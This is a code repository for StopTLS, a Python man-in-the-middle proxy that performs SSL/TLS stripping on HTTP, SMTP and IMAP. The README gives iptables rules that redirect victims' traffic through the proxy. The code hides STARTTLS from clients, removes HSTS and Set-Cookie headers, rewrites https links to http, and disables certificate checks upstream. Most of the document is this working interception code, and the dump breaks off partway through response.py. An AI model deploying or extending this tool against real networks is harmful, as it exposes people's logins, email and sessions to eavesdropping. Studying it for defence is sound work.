├── .gitignore
├── README.md
├── main.py
├── requirements.txt
├── setup.py
└── stoptls
    ├── __init__.py
    ├── base.py
    ├── cache.py
    ├── resolver.py
    ├── tcp.py
    ├── tcp
    │   ├── __init__.py
    │   ├── base.py
    │   ├── imap.py
    │   └── smtp.py
    └── web
        ├── __init__.py
        ├── regex.py
        ├── request.py
        └── response.py

--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
# Byte-compiled / optimized / DLL files
__pycache__/
*.py[cod]
*$py.class

# C extensions
*.so

# Distribution / packaging
.Python
env/
build/
develop-eggs/
dist/
downloads/
eggs/
.eggs/
lib/
lib64/
parts/
sdist/
var/
wheels/
*.egg-info/
.installed.cfg
*.egg

# PyInstaller
# Usually these files are written by a python script from a template
# before PyInstaller builds the exe, so as to inject date/other infos into it.
*.manifest
*.spec

# Installer logs
pip-log.txt
pip-delete-this-directory.txt

# Unit test / coverage reports
htmlcov/
.tox/
.coverage
.coverage.*
.cache
nosetests.xml
coverage.xml
*.cover
.hypothesis/

# Translations
*.mo
*.pot

# Django stuff:
*.log
local_settings.py

# Flask stuff:
instance/
.webassets-cache

# Scrapy stuff:
.scrapy

# Sphinx documentation
docs/_build/

# PyBuilder
target/

# Jupyter Notebook
.ipynb_checkpoints

# pyenv
.python-version

# celery beat schedule file
celerybeat-schedule

# SageMath parsed files
*.sage.py

# dotenv
.env

# virtualenv
.venv
venv/
ENV/

# Spyder project settings
.spyderproject
.spyproject

# Rope project settings
.ropeproject

# mkdocs documentation
/site

# mypy
.mypy_cache/
*~
.pytest_cache

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# StopTLS

StopTLS is a Man-in-the-Middle tool which performs opportunistic SSL/TLS stripping.

Currently it supports the following protocols: HTTP(S), SMTP, and IMAP.

It requires Python >= 3.7 (the code uses `asyncio.get_running_loop` and `Server.serve_forever`, both added in 3.7), the [aiohttp](https://aiohttp.readthedocs.io/en/stable/) library, and the [Beautiful Soup](https://www.crummy.com/software/BeautifulSoup/) library for HTML parsing.

## Usage
```
usage: main.py [--help] [-h [HTTP_PORT]] [-t [TCP_PORT]]
               [-p {SMTP,IMAP} [{SMTP,IMAP} ...]]

MitM proxy which performs opportunistic SSL/TLS stripping

optional arguments:
  --help                show this help message and exit
  -h [HTTP_PORT], --http [HTTP_PORT]
                        HTTP listen port [default: 10000]
  -t [TCP_PORT], --tcp [TCP_PORT]
                        TCP listen port [default: 49151]
  -p {SMTP,IMAP} [{SMTP,IMAP} ...], --tcp-protocols {SMTP,IMAP} [{SMTP,IMAP} ...]
                        supported TCP protocols
```

## Setup
### 1. Download
```bash
$ git clone https://github.com/mathewmarcus/StopTLS.git
```

### 2. Install Dependencies
```bash
$ pip install -r requirements.txt
```
### 3. Add `iptables` rules
Add rules to redirect and allow traffic to the ports specified by the `-h [HTTP_PORT], --http [HTTP_PORT]` and `-t [TCP_PORT], --tcp [TCP_PORT]` options.

`stoptls` is set up to handle HTTP traffic on one port, and all other TCP traffic on another, as indicated by the CLI options.

So, assuming the following `stoptls` invocation:
```bash
$ python main.py --http 8080 --tcp 8081 --tcp-protocols SMTP IMAP
```

`iptables` rules would then need to be added to the `PREROUTING` chain in the `nat` table and the `INPUT` chain in the `filter` table, as shown below:

#### `nat` table, `PREROUTING` chain
##### HTTP
```bash
$ sudo iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080
```

##### SMTP
```bash
$ sudo iptables -t nat -A PREROUTING -p tcp --dport 25 -j REDIRECT --to-port 8081
$ sudo iptables -t nat -A PREROUTING -p tcp --dport 587 -j REDIRECT --to-port 8081
```

##### IMAP
```bash
$ sudo iptables -t nat -A PREROUTING -p tcp --dport 143 -j REDIRECT --to-port 8081
```

#### `filter` table, `INPUT` chain
Assuming a default `DROP` policy on this chain, add rules for the `HTTP_PORT` and/or `TCP_PORT`s specified earlier. So, for the above example:

##### HTTP
```bash
$ sudo iptables -A INPUT -p tcp --dport 8080 -m conntrack --ctorigdstport 80 -j ACCEPT
```

##### SMTP
```bash
$ sudo iptables -A INPUT -p tcp --dport 8081 -m conntrack --ctorigdstport 25 -j ACCEPT
$ sudo iptables -A INPUT -p tcp --dport 8081 -m conntrack --ctorigdstport 587 -j ACCEPT
```

##### IMAP
```bash
$ sudo iptables -A INPUT -p tcp --dport 8081 -m conntrack --ctorigdstport 143 -j ACCEPT
```

Why the `--ctorigdstport` option? It ensures the `stoptls` ports only accept redirected traffic whose original destination was one of the target protocol ports, so the proxy ports are not directly accessible (i.e. they will not appear in `nmap` scans).

## TODO
`StopTLS` is very much a work in progress, and is essentially a proof of concept at this point. Currently it doesn't log anything; it simply strips and proxies connections. Below is a non-exhaustive list of features to be added:

1. Logging
2. Advanced configuration via an INI file
3. Custom log traffic filters for all protocols via config file directives and/or user-supplied callables (functions, methods, etc.)
4. Support for additional, user-supplied protocols, by subclassing the `stoptls.base.Proxy` and/or `stoptls.tcp.base.TCPProxyConn` abstract classes (see the sketch below)
5. Support for more complex, non-standard HTTP login mechanisms
6. Packaging and distribution via `pip` and the PyPI repository
7. Integration testing with Docker

## Why?
Why create yet another SSL stripping tool when...
1. tools such as `sslstrip` and `sslsplit` already exist
2. HTTP Strict Transport Security (HSTS) has significantly limited the effectiveness of SSL stripping attacks.

There are several answers:
1. I wanted to better understand the SSL stripping attack vector.
2. I wanted to implement an SSL stripping proxy using Python 3's native asynchronous support via `asyncio`, as opposed to an external library such as `twisted`.
3. I wanted a tool which supported, or could support, any TCP protocol which uses opportunistic SSL/TLS, in addition to HTTP.
4. I wanted a tool which was highly extensible and customizable.
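As a taste of item 4 of the TODO list, here is a minimal, hypothetical sketch of what a user-supplied protocol handler might look like, assuming the `TCPProxyConn` interface shown in `stoptls/tcp/base.py` below. The `POP3ProxyConn` name, port, and behaviour are illustrative only (real POP3 `STLS` handling is omitted):

```python
from stoptls.tcp.base import TCPProxyConn


class POP3ProxyConn(TCPProxyConn):
    """Hypothetical handler: relay lines verbatim, without any stripping."""
    protocol = 'POP3'
    ports = (110,)

    async def strip(self):
        # Relay the server banner, then shuttle lines in both directions.
        banner = await self.server_reader.readline()
        self.client_writer.write(banner)
        await self.client_writer.drain()

        while not (self.client_reader.at_eof() or self.server_reader.at_eof()):
            client_data = await self.client_reader.readline()
            self.server_writer.write(client_data)
            await self.server_writer.drain()

            server_data = await self.server_reader.readline()
            self.client_writer.write(server_data)
            await self.client_writer.drain()

        # The base class closes both connections.
        await super().strip()
```

To be usable, such a class would also need an entry in `TCPProxy.proxy_connection_handlers` (see `stoptls/tcp/__init__.py`).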
--------------------------------------------------------------------------------
/main.py:
--------------------------------------------------------------------------------
import asyncio
import argparse
import sys

from stoptls.web import HTTPProxy
from stoptls.tcp import TCPProxy


# -h is repurposed for --http, so conflict_handler='resolve' lets it override
# the default -h short option while --help stays intact.
parser = argparse.ArgumentParser(add_help=True,
                                 conflict_handler='resolve',
                                 description='MitM proxy which performs \
                                 opportunistic SSL/TLS stripping')
parser.add_argument('-h', '--http',
                    type=int,
                    nargs='?',
                    const=10000,
                    dest='http_port',
                    help='HTTP listen port [default: %(const)i]')
parser.add_argument('-t', '--tcp',
                    type=int,
                    nargs='?',
                    const=49151,
                    dest='tcp_port',
                    help='TCP listen port [default: %(const)i]')
parser.add_argument('-p', '--tcp-protocols',
                    default=['SMTP', 'IMAP'],
                    nargs='+',
                    choices=['SMTP', 'IMAP'],
                    help='supported TCP protocols')

if __name__ == '__main__':
    args = parser.parse_args()

    if not (args.http_port or args.tcp_port):
        parser.print_help()
        print('\nSelect -h [HTTP_PORT], --http [HTTP_PORT] and/or -t [TCP_PORT], --tcp [TCP_PORT]')
        sys.exit(1)

    loop = asyncio.get_event_loop()

    # Schedule whichever proxies were requested on the same event loop.
    if args.http_port:
        asyncio.ensure_future(HTTPProxy.main(args.http_port,
                                             args))
    if args.tcp_port:
        asyncio.ensure_future(TCPProxy.main(args.tcp_port,
                                            args))
    loop.run_forever()

--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
aiohttp
beautifulsoup4

--------------------------------------------------------------------------------
/setup.py:
--------------------------------------------------------------------------------
from setuptools import setup, find_packages

setup(
    name="stoptls",
    version="0.1.0",
    # find_packages() picks up the stoptls.tcp and stoptls.web subpackages,
    # which a bare packages=['stoptls'] would omit.
    packages=find_packages(),
    description='MitM tool which performs opportunistic SSL/TLS stripping',
    author='Mathew Marcus',
    author_email='mathewmarcus456@gmail.com',
    long_description=open('README.md').read(),
    long_description_content_type='text/markdown',
    python_requires='>=3.7',
    install_requires=[
        'aiohttp>=3.4.4',
        'beautifulsoup4>=4.6.3'
    ]
)

--------------------------------------------------------------------------------
/stoptls/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mathewmarcus/StopTLS/bd3dcf47ac1571e91abdd49bbcdf707f8e6a4cff/stoptls/__init__.py

--------------------------------------------------------------------------------
/stoptls/base.py:
--------------------------------------------------------------------------------
import abc
import asyncio


class Proxy(abc.ABC):
    protocol = None

    def __init__(self):
        super().__init__()

    @abc.abstractmethod
    def __call__(self, *args, **kwargs):
        return

    @classmethod
    async def main(cls, port, cli_args, *args, **kwargs):
        # Instantiate the concrete proxy and serve it as the
        # client-connected callback of a plain asyncio server.
        proxy = cls(*args, **kwargs)
        server = await asyncio.start_server(proxy, port=port)

        print("Serving {protocol} on {port}...".format(protocol=cls.protocol,
                                                       port=port))

        async with server:
            await server.serve_forever()
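To make the `Proxy` contract concrete: a subclass supplies `protocol` and an async `__call__` that receives the `(reader, writer)` pair from `asyncio.start_server`. A minimal hypothetical sketch (the `EchoProxy` name and behaviour are illustrative, not part of the codebase):

```python
import asyncio

from stoptls.base import Proxy


class EchoProxy(Proxy):
    protocol = 'ECHO'

    async def __call__(self, reader, writer):
        # Echo a single line back to the client, then hang up.
        data = await reader.readline()
        writer.write(data)
        await writer.drain()
        writer.close()


# Served the same way main.py serves HTTPProxy/TCPProxy:
# asyncio.run(EchoProxy.main(9000, cli_args=None))
```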
--------------------------------------------------------------------------------
/stoptls/cache.py:
--------------------------------------------------------------------------------
import urllib.parse


class InMemoryCache(object):
    def __init__(self):
        self.cache = {}

    def get_client_cache(self, client_ip):
        return ClientCache(self.cache.setdefault(client_ip, {}))


class RedisCache(object):
    def __init__(self):
        raise NotImplementedError


class ClientCache(object):
    def __init__(self, data):
        self.cache = data

    def add_url(self, url, host=None):
        # Unescape the URL, which may arrive backslash- or percent-encoded.
        try:
            unescaped_url = bytes(url, 'ascii').decode('unicode_escape')
        except UnicodeDecodeError:
            unescaped_url = url

        unquoted_url = urllib.parse.unquote_plus(unescaped_url)
        scheme, netloc, path, query, frag = urllib.parse.urlsplit(unquoted_url)

        # Prefer the host embedded in the URL itself; fall back to the
        # caller-supplied host for relative URLs.
        if netloc or not host:
            host = netloc

        rel_url = urllib.parse.urlunsplit(('', '', path, query, frag))
        self.cache.setdefault(host, {})\
            .setdefault('rel_urls', set())\
            .add(rel_url)

    def has_url(self, host, rel_url):
        try:
            return urllib.parse.unquote_plus(rel_url) in self.cache[host]['rel_urls']
        except KeyError:
            return False

    def add_cookie(self, host, cookie):
        self.cache.setdefault(host, {})\
            .setdefault('cookies', set())\
            .add(cookie)

    def has_cookie(self, host, cookie):
        try:
            return cookie in self.cache[host]['cookies']
        except KeyError:
            return False

    def has_domain(self, host):
        try:
            return self.cache[host]
        except KeyError:
            return False

--------------------------------------------------------------------------------
/stoptls/resolver.py:
--------------------------------------------------------------------------------
import asyncio
import socket


dns_cache = {}


async def dns_resolve(hostname):
    # Strip any :port suffix, then resolve (and memoize) the IPv4 address.
    hostname = hostname.split(':')[0]
    try:
        return dns_cache[hostname]
    except KeyError:
        addrinfo = await asyncio.get_running_loop().getaddrinfo(hostname,
                                                                None,
                                                                family=socket.AF_INET,
                                                                type=socket.SOCK_STREAM,
                                                                proto=socket.SOL_TCP)
        ip = addrinfo[0][4][0]
        dns_cache[hostname] = ip
        return ip

--------------------------------------------------------------------------------
/stoptls/tcp.py:
--------------------------------------------------------------------------------
import asyncio


async def main():
    # Placeholder server; the client-connected callback receives
    # a (reader, writer) pair.
    server = await asyncio.start_server(lambda reader, writer: None,
                                        '127.0.0.1', 8081)

    print("======= Serving generic TCP on 127.0.0.1:8081 ======")

    async with server:
        await server.serve_forever()

--------------------------------------------------------------------------------
/stoptls/tcp/__init__.py:
--------------------------------------------------------------------------------
import asyncio
import socket
import struct
import logging

from stoptls.base import Proxy
from stoptls.tcp.imap import IMAPProxyConn
from stoptls.tcp.smtp import SMTPProxyConn


class TCPProxy(Proxy):
    protocol = 'TCP'
    # Value of SO_ORIGINAL_DST from <linux/netfilter_ipv4.h>, used to ask
    # netfilter for the pre-REDIRECT destination of a connection.
    SO_ORIGINAL_DST = 80
    proxy_connection_handlers = {IMAPProxyConn.protocol: IMAPProxyConn,
                                 SMTPProxyConn.protocol: SMTPProxyConn}

    def __init__(self, connection_handlers):
        # TODO: process command line arguments
        # Map each egress port (e.g. 25, 143) to its protocol handler.
        self.conn_switcher = {}
        for handler in connection_handlers:
            for port in handler.ports:
                logging.debug('Egress port {}: {}'.format(port, handler))
                self.conn_switcher[port] = handler
        super().__init__()
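
    # __call__ is the client_connected_cb handed to asyncio.start_server:
    # it recovers the original destination, opens a connection to it, and
    # hands both stream pairs to the protocol-specific handler.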
    async def __call__(self, client_reader, client_writer):
        dst_addr, dst_port = self.get_orig_dst_socket(client_writer)
        logging.debug('Original destination: {}:{}'.format(dst_addr, dst_port))

        # Look the handler up before dialing out, so an unhandled port
        # fails fast instead of leaking a half-open server connection.
        try:
            handler = self.conn_switcher[dst_port]
        except KeyError:
            raise Exception('No handler set up for destination port: {}'
                            .format(dst_port))

        server_reader, server_writer = await asyncio.open_connection(dst_addr,
                                                                     dst_port)
        conn = handler(client_reader, client_writer,
                       server_reader, server_writer)
        logging.debug('Handling connection to {}:{}'.format(dst_addr,
                                                            dst_port))
        await conn.strip()

    def get_orig_dst_socket(self, client_writer):
        sock = client_writer.get_extra_info('socket')
        # getsockopt returns a struct sockaddr_in: 2 bytes of address
        # family, 2 bytes of port (network order), 4 bytes of IPv4 address.
        sockaddr_in = sock.getsockopt(socket.SOL_IP,
                                      TCPProxy.SO_ORIGINAL_DST,
                                      16)
        port, = struct.unpack('!H', sockaddr_in[2:4])
        address = socket.inet_ntoa(sockaddr_in[4:8])
        return address, port

    @classmethod
    async def main(cls, port, cli_args, *args, **kwargs):
        conn_handlers = (cls.proxy_connection_handlers[p] for p in cli_args.tcp_protocols)

        await super().main(port, cli_args, connection_handlers=conn_handlers)

--------------------------------------------------------------------------------
/stoptls/tcp/base.py:
--------------------------------------------------------------------------------
import asyncio
import socket
import ssl
import logging
import abc


class TCPProxyConn(abc.ABC):
    protocol = None
    ports = None
    command_re = None
    response_re = None
    starttls_re = None

    def __init__(self, client_reader, client_writer,
                 server_reader, server_writer):
        self.client_reader = client_reader
        self.client_writer = client_writer
        self.server_reader = server_reader
        self.server_writer = server_writer
        super().__init__()

    @abc.abstractmethod
    async def strip(self):
        # Subclasses do the protocol-specific stripping, then call
        # super().strip() to tear both connections down.
        self.server_writer.close()
        self.client_writer.close()
        logging.debug('Connections closed')

    async def upgrade_connection(self):
        # Wrap the existing plaintext server socket in TLS. Certificate
        # validation is deliberately disabled: the goal is to keep the
        # upstream connection alive, not to authenticate it.
        sc = ssl.create_default_context(ssl.Purpose.SERVER_AUTH)
        sc.check_hostname = False
        sc.verify_mode = ssl.CERT_NONE

        try:
            nameinfo = await asyncio.get_running_loop()\
                .getnameinfo(self.server_writer.get_extra_info('peername'),
                             socket.NI_NAMEREQD)
            self.server_reader, self.server_writer = await asyncio \
                .open_connection(sock=self.server_writer.get_extra_info('socket'),
                                 ssl=sc,
                                 server_hostname=nameinfo[0])
            return True
        except Exception:
            logging.exception('Failed to upgrade to TLS')
            return False
--------------------------------------------------------------------------------
/stoptls/tcp/imap.py:
--------------------------------------------------------------------------------
import re
import logging

from stoptls.tcp.base import TCPProxyConn


class IMAPProxyConn(TCPProxyConn):
    protocol = 'IMAP'
    ports = (143,)
    command_re = re.compile(r'^(?P<tag>\S*) (?P<command>[A-Za-z]*)\r?\n$')
    response_re = re.compile(r'^(?P<tag>\S*) (?:(?P<ok>[Oo][Kk])|(?P<bad>[Bb][Aa][Dd])|(?P<no>[Nn][Oo])|(?P<bye>[Bb][Yy][Ee]) )?(?P<response>.*)\r\n$')
    starttls_re = re.compile('( ?)STARTTLS( ?)', flags=re.IGNORECASE)

    async def strip(self):
        cls = type(self)
        banner = await self.server_reader.readline()
        logging.debug('Received banner: {}'.format(banner))

        banner = banner.decode('ascii')
        banner_re = cls.response_re.fullmatch(banner)

        if banner_re and \
           banner_re.group('response') and \
           cls.starttls_re.search(banner_re.group('response')):
            # Hide the STARTTLS capability from the client, then upgrade
            # the server side ourselves.
            banner = cls.starttls_re.sub('', banner_re.group(0))
            await self.start_tls()
        else:
            # It's possible that STARTTLS, among other capabilities, wasn't
            # included in the IMAP banner. In this case, we issue the
            # CAPABILITY command. If STARTTLS is indeed a capability, then we
            # upgrade the connection.
            self.server_writer.write(b'asdf CAPABILITY\r\n')
            await self.server_writer.drain()

            tls_supported = await self.server_reader.readline()
            logging.debug('Received data from server: {}'.format(tls_supported))
            tls_supported_re = cls.response_re.fullmatch(tls_supported.decode('ascii'))

            if tls_supported_re and \
               tls_supported_re.group('response') and \
               cls.starttls_re.search(tls_supported_re.group('response')):
                # Consume the tagged completion ("asdf OK ...") of the
                # CAPABILITY command before issuing STARTTLS.
                await self.server_reader.readline()
                await self.start_tls()

        self.client_writer.write(banner.encode('ascii'))
        logging.debug('Writing banner to client...')
        await self.client_writer.drain()

        while not self.server_reader.at_eof():
            client_data = await self.client_reader.readline()
            logging.debug('Received client data: {}'.format(client_data))

            if self.client_reader.at_eof():
                logging.debug('Client closed connection')
                break

            try:
                self.server_writer.write(client_data)
                logging.debug('Writing client data to server...')
                await self.server_writer.drain()
            except ConnectionResetError:
                break

            # Relay untagged (*) responses until the tagged completion
            # line (or a BAD response) for this command arrives.
            while True:
                logging.debug('Reading from server...')
                server_data = await self.server_reader.readline()

                logging.debug('Received server data: {}'.format(server_data))

                self.client_writer.write(server_data)
                logging.debug('Writing server data to client...')
                await self.client_writer.drain()

                server_data_re = cls.response_re.fullmatch(server_data.decode('ascii'))

                if not server_data_re or \
                   server_data_re.group('tag') != '*' or \
                   server_data_re.group('bad'):
                    break

        await super().strip()

    async def start_tls(self):
        # RFC 3501 lines are CRLF-terminated; the tag is arbitrary.
        self.server_writer.write('asdf STARTTLS\r\n'.encode('ascii'))
        await self.server_writer.drain()

        tls_started = await self.server_reader.readline()
        tls_started_re = type(self).response_re.fullmatch(tls_started.decode('ascii'))

        if tls_started_re and tls_started_re.group('ok'):
            logging.debug('Successfully upgraded to TLS!')
            return await self.upgrade_connection()
        else:
            logging.debug('Failed to upgrade to TLS')
            return False
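To make the response grammar concrete, a couple of hedged examples of how `response_re` classifies IMAP server lines (the example lines themselves are illustrative):

```python
import re

response_re = re.compile(r'^(?P<tag>\S*) (?:(?P<ok>[Oo][Kk])|(?P<bad>[Bb][Aa][Dd])|(?P<no>[Nn][Oo])|(?P<bye>[Bb][Yy][Ee]) )?(?P<response>.*)\r\n$')

# An untagged greeting advertising STARTTLS.
banner = response_re.fullmatch('* OK [CAPABILITY IMAP4rev1 STARTTLS] ready\r\n')
assert banner.group('tag') == '*' and banner.group('ok') == 'OK'

# A tagged error response.
rejection = response_re.fullmatch('a1 BAD Invalid command\r\n')
assert rejection.group('bad') == 'BAD'
```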
--------------------------------------------------------------------------------
/stoptls/tcp/smtp.py:
--------------------------------------------------------------------------------
import asyncio
import socket
import re
import logging

from stoptls.tcp.base import TCPProxyConn


class SMTPProxyConn(TCPProxyConn):
    protocol = 'SMTP'
    ports = (25, 587)
    command_re = re.compile(r'^(?P<cmd>\S*)(?P<args> .*)\r?\n$')
    response_re = re.compile(r'^(?P<status_code>[0-9]{3})(?:(?P<line_cont>-)| )(?P<message>.*)?\r\n$')

    async def strip(self):
        cls = type(self)
        banner = await self.server_reader.readline()
        logging.debug('Received banner: {}'.format(banner))

        self.client_writer.write(banner)
        logging.debug('Writing banner to client...')
        await self.client_writer.drain()

        # Preemptively issue an EHLO command.
        # If STARTTLS is supported, we upgrade the connection.
        client_address, client_port = self.client_writer.get_extra_info('peername')

        try:
            # getnameinfo returns a (host, port) pair; keep the host.
            client_hostname = (await asyncio.get_running_loop()
                               .getnameinfo((client_address,
                                             client_port)))[0]
        except socket.gaierror:
            client_hostname = client_address

        self.server_writer.write('EHLO {}\r\n'.format(client_hostname).encode('ascii'))
        await self.server_writer.drain()

        # Process EHLO response.
        # TODO: Move this logic into a method
        ehlo_response = await self.server_reader.readline()
        ehlo_response_re = cls.response_re.fullmatch(ehlo_response.decode('ascii'))
        tls_supported = False
        while (not self.server_reader.at_eof() and
               ehlo_response_re and
               ehlo_response_re.group('line_cont')):
            if ehlo_response_re.group('message') and \
               ehlo_response_re.group('message').upper() == 'STARTTLS':
                tls_supported = True

            ehlo_response = await self.server_reader.readline()
            ehlo_response_re = cls.response_re.fullmatch(ehlo_response.decode('ascii'))

        if tls_supported:
            await self.start_tls()

        while not self.server_reader.at_eof():
            client_data = await self.client_reader.readline()
            logging.debug('Received client data: {}'.format(client_data))

            client_data_re = cls.command_re.fullmatch(client_data.decode('ascii'))
            if self.client_reader.at_eof():
                logging.debug('Client closed connection')
                break

            try:
                self.server_writer.write(client_data)
                logging.debug('Writing client data to server...')
                await self.server_writer.drain()
            except ConnectionResetError:
                break

            logging.debug('Reading line from server...')

            server_data = await self.server_reader.readline()

            logging.debug('Received server data: {}'.format(server_data))
            self.client_writer.write(server_data)
            logging.debug('Writing server data to client...')
            await self.client_writer.drain()

            server_data_re = cls.response_re.fullmatch(server_data.decode('ascii'))

            if client_data_re:
                if client_data_re.group('cmd').upper() == 'EHLO':
                    # Relay the remaining lines of a multiline (250-...)
                    # EHLO response.
                    while (not self.server_reader.at_eof() and
                           server_data_re and
                           server_data_re.group('line_cont')):
                        server_data = await self.server_reader.readline()
                        server_data_re = cls.response_re.fullmatch(server_data.decode('ascii'))
                        logging.debug('Received server data: {}'.format(server_data))
                        self.client_writer.write(server_data)
                        logging.debug('Writing server data to client...')
                        await self.client_writer.drain()
                elif (client_data_re.group('cmd').upper() == 'DATA' and
                      server_data_re and
                      server_data_re.group('status_code') == '354'):
                    # Shuttle the message body through verbatim until the
                    # lone-dot terminator line.
                    client_data = await self.client_reader.readline()
                    self.server_writer.write(client_data)
                    await self.server_writer.drain()
                    while client_data != b'.\r\n':
                        client_data = await self.client_reader.readline()
                        self.server_writer.write(client_data)
                        await self.server_writer.drain()

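                    # Relay the server's verdict on the queued message
                    # (e.g. "250 2.0.0 Ok") back to the client.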
                    logging.debug('Reading line from server...')
                    server_data = await self.server_reader.readline()

                    if self.server_reader.at_eof():
                        logging.debug('Server closed connection')
                        break

                    logging.debug('Received server data: {}'.format(server_data))
                    self.client_writer.write(server_data)
                    logging.debug('Writing server data to client...')
                    await self.client_writer.drain()

        await super().strip()

    async def start_tls(self):
        # RFC 5321 commands are CRLF-terminated.
        self.server_writer.write('STARTTLS\r\n'.encode('ascii'))
        await self.server_writer.drain()

        tls_started = await self.server_reader.readline()
        tls_started_re = type(self).response_re.fullmatch(tls_started.decode('ascii'))

        if tls_started_re and \
           tls_started_re.group('status_code') == '220':
            logging.debug('Successfully upgraded to TLS!')
            return await self.upgrade_connection()
        else:
            logging.debug('Failed to upgrade to TLS')
            return False
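For clarity, the `line_cont` group is what distinguishes the `250-` continuation lines of a multiline EHLO response from the final `250 ` line. A small hedged demonstration (the example lines are illustrative):

```python
import re

response_re = re.compile(r'^(?P<status_code>[0-9]{3})(?:(?P<line_cont>-)| )(?P<message>.*)?\r\n$')

assert response_re.fullmatch('250-STARTTLS\r\n').group('line_cont') == '-'
assert response_re.fullmatch('250 SMTPUTF8\r\n').group('line_cont') is None
```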
--------------------------------------------------------------------------------
/stoptls/web/__init__.py:
--------------------------------------------------------------------------------
import asyncio
import aiohttp.web

from stoptls.base import Proxy
from stoptls.web.request import RequestProxy
from stoptls.web.response import ResponseProxy
from stoptls.cache import InMemoryCache


class HTTPProxy(Proxy):
    protocol = 'HTTP'

    def __init__(self):
        self._tcp_connector = aiohttp.TCPConnector(ttl_dns_cache=None)
        self.session = aiohttp.ClientSession(connector=self._tcp_connector,
                                             cookie_jar=aiohttp.DummyCookieJar())
        self.cache = InMemoryCache()

    async def __call__(self, request):
        request['cache'] = self.cache.get_client_cache(request.remote)
        request['session'] = self.session
        response = await RequestProxy(request).proxy_request()
        stripped_response = await ResponseProxy(response,
                                                request.host,
                                                request['cache']).strip_response()
        await stripped_response.prepare(request)
        return stripped_response

    @classmethod
    async def main(cls, port, cli_args):
        # HTTP is a special case because it uses aiohttp rather than raw
        # asyncio. As such, it uses loop.create_server instead of
        # start_server, in order to adhere to the aiohttp documentation.
        proxy = cls()
        server = await asyncio \
            .get_running_loop() \
            .create_server(aiohttp.web.Server(proxy), port=port)
        print('Serving HTTP on {}'.format(port))

        async with server:
            await server.serve_forever()

--------------------------------------------------------------------------------
/stoptls/web/regex.py:
--------------------------------------------------------------------------------
import re

# Matches "://" as-is, backslash-escaped (":\x2f\x2f"), or percent-encoded
# ("%3A%2F%2F"), so URLs inside JavaScript strings are also caught.
SCHEME_DELIMITER = re.compile(r':\/\/|:(?:\\x2[Ff]){2}|%3[Aa](?:%2[Ff]){2}')
SCHEME = re.compile('(?:https)({})'.format(SCHEME_DELIMITER.pattern))
SECURE_URL = re.compile(r'(?:https)((?:{})[a-zA-Z0-9.\/?\-#=&;%:~_$@+,\\]+)'
                        .format(SCHEME_DELIMITER.pattern),
                        flags=re.IGNORECASE)
UNSECURE_URL = re.compile(r'(?:http)((?:{})[a-zA-Z0-9.\/?\-#=&;%:~_$@+,\\]+)'
                          .format(SCHEME_DELIMITER.pattern),
                          flags=re.IGNORECASE)
RELATIVE_URL = re.compile(r'(^\/(?!\/)[a-zA-Z0-9.\/?\-#=&;%:~_$@+,\\]+)')
COOKIE_SECURE_FLAG = re.compile('Secure;?',
                                flags=re.IGNORECASE)
CSS_OR_SCRIPT = re.compile('^script$|^style$')
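A brief hedged illustration of what these patterns catch, whether the scheme delimiter appears raw or percent-encoded (the URLs are examples only):

```python
from stoptls.web import regex

assert regex.SECURE_URL.fullmatch('https://example.com/login')
assert regex.SECURE_URL.fullmatch('https%3A%2F%2Fexample.com%2Flogin')
assert not regex.SECURE_URL.fullmatch('http://example.com/')
```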
--------------------------------------------------------------------------------
/stoptls/web/request.py:
--------------------------------------------------------------------------------
import urllib.parse

from stoptls.web import regex


class RequestProxy(object):
    HEADER_BLACKLIST = [
        'Upgrade-Insecure-Requests',
        'Host'
    ]

    def __init__(self, request):
        self.request = request
        self.host = request.host
        self.cache = request['cache']
        self.session = request['session']

    async def proxy_request(self):
        # Check whether this URL was previously stripped and cached; if so,
        # the upstream request must go out over HTTPS.
        if self.cache.has_url(self.host,
                              self.request.rel_url.human_repr()):
            scheme = 'https'
        else:
            scheme = 'http'

        query_params = self.unstrip_query_params(self.request.url.query)

        orig_headers = dict(self.request.headers)
        headers = self.filter_and_strip_headers(orig_headers)

        # Kill sessions: only forward cookies we have previously stripped.
        cookies = self.filter_cookies(self.request.cookies)
        headers['Cookie'] = '; '.join(cookies)
        # TODO: possibly also remove certain types of auth
        # (e.g. Authorization: Bearer)

        url = urllib.parse.urlunsplit((scheme,
                                       self.host,
                                       self.request.path,
                                       '',
                                       self.request.url.fragment))
        method = self.request.method.lower()
        data = self.request.content if self.request.can_read_body else None

        # TODO: possibly use the built-in aiohttp.ClientSession cache to
        # store cookies, maybe by subclassing aiohttp.abc.AbstractCookieJar
        return await self.session.request(method,
                                          url,
                                          data=data,
                                          headers=headers,
                                          params=query_params,
                                          # allow_redirects=False prevents
                                          # auto-redirection
                                          allow_redirects=False)

    def filter_and_strip_headers(self, headers):
        for header in type(self).HEADER_BLACKLIST:
            headers.pop(header, None)

        # Upgrade the Origin header back to https for domains we stripped.
        try:
            parsed_origin = urllib.parse.urlsplit(headers['Origin'])
            if self.cache.has_domain(parsed_origin.netloc):
                headers['Origin'] = parsed_origin._replace(scheme='https').geturl()
        except KeyError:
            pass

        return headers

    def unstrip_query_params(self, query_params):
        unstripped_params = query_params.copy()
        for key, value in query_params.items():
            # Un-strip secure URLs embedded in query params.
            if regex.UNSECURE_URL.fullmatch(value):
                parsed_url = urllib.parse.urlsplit(value)
                if self.cache.has_url(parsed_url.netloc,
                                      urllib.parse.urlunsplit(('',
                                                               '',
                                                               parsed_url.path,
                                                               parsed_url.query,
                                                               parsed_url.fragment))):
                    unstripped_params.update({key: parsed_url._replace(scheme='https').geturl()})
        return unstripped_params

    def filter_cookies(self, cookies):
        for name, value in cookies.items():
            if self.cache.has_cookie(self.host,
                                     name):
                yield '{}={}'.format(name, value)

--------------------------------------------------------------------------------
/stoptls/web/response.py:
--------------------------------------------------------------------------------
import aiohttp.web
import bs4
import urllib.parse

from stoptls.web import regex


class ResponseProxy(object):
    HEADER_BLACKLIST = [
        'Strict-Transport-Security',
        'Content-Length',
        'Content-Encoding',
        'Transfer-Encoding',
        'Set-Cookie'
    ]

    def __init__(self, response, host, cache):
        self.response = response
        self.host = host
        self.cache = cache

    async def strip_response(self):
        # Strip secure URLs from HTML, JavaScript, and CSS bodies.
        if self.response.content_type == 'text/html':
            try:
                body = await self.response.text()
            except UnicodeDecodeError:
                # Fall back to UTF-8 if the declared charset was wrong.
                raw_body = await self.response.read()
                body = raw_body.decode('utf-8')
            body = self.strip_html_body(body)
